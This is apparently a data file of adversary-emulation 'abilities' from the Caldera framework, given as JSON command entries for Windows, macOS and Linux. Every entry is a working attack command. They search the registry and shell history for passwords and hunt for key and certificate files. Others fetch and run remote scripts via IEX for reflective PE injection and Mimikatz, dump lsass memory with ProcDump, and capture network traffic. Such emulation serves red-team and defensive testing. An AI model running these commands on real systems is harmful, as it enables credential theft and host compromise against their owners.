Caldera emulation abilities

[{"platform": "windows", "executor": "psh", "command": "reg query HKCU /f password /t REG_SZ /s\n"}]

[{"platform": "windows", "executor": "psh", "command": "reg query HKLM /f password /t REG_SZ /s\n"}]

[{"platform": "darwin", "executor": "sh", "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.bash_history"}]

[{"platform": "windows", "executor": "psh", "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n"}, {"platform": "windows", "executor": "cmd", "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n"}, {"platform": "darwin", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n"}, {"platform": "linux", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;"}]

[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose"}]

[{"platform": "windows", "executor": "psh", "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n    iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n    iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n"}]

[{"platform": "windows", "executor": "psh", "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n"}]

[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n"}]

[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n"}]

[{"platform": "windows", "executor": "psh", "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n  echo $path;\n  exit 0;\n} else {\n  echo \"Failed to generate PCAP file.\";\n  exit 1;\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "tcpdump -i en0 & sleep 5; kill $!\n"}]